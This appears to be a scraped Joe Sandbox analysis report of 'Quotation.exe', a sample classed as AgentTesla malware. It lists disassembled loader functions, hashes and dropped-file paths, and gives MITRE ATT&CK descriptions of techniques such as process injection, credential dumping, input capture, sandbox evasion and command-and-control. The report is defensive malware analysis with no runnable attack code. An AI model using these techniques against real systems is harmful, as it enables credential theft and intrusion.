Source File: 00000009.00000002.2495712410.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2495671740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495758213.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495799657.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495942530.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_Quotation.jbxd

Similarity

API ID: ErrorModeVersion
String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
API String ID: 3050056751-1170945346
Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3

Strings

%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4
UXTHEME, xrefs: 0040618B

Memory Dump Source

Source File: 00000009.00000002.2495712410.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2495671740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495758213.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495799657.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495942530.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_Quotation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5
UXTHEME, xrefs: 004068C4, 004068D1, 004068DC

Memory Dump Source

Source File: 00000009.00000002.2495712410.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2495671740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495758213.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495799657.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.2495942530.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_Quotation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll

C:\Users\user\Music\antithetic.ini

C:\Users\user\overlays\besvangredes\Emmens.udk

C:\Users\user\overlays\besvangredes\Induktionskogezoner.Nsk

C:\Users\user\overlays\besvangredes\Proprietrer.bet

C:\Users\user\overlays\besvangredes\Smalfilmerens.Sem

C:\Users\user\overlays\besvangredes\Trikstanks.pra

C:\Users\user\overlays\besvangredes\boyaus.rom

C:\Users\user\overlays\besvangredes\gear.dra

C:\Users\user\overlays\besvangredes\jagtfalk.ill

C:\Users\user\overlays\besvangredes\regill.ful

C:\Users\user\overlays\besvangredes\sortlistningens.txt

Static File Info

General

File Icon

Windows Analysis Report
Quotation.exe

Function 004036DA Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 416
stringfilecomCOMMON

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A1C Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441
stringtimesleepCOMMON

Function 004033CB Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre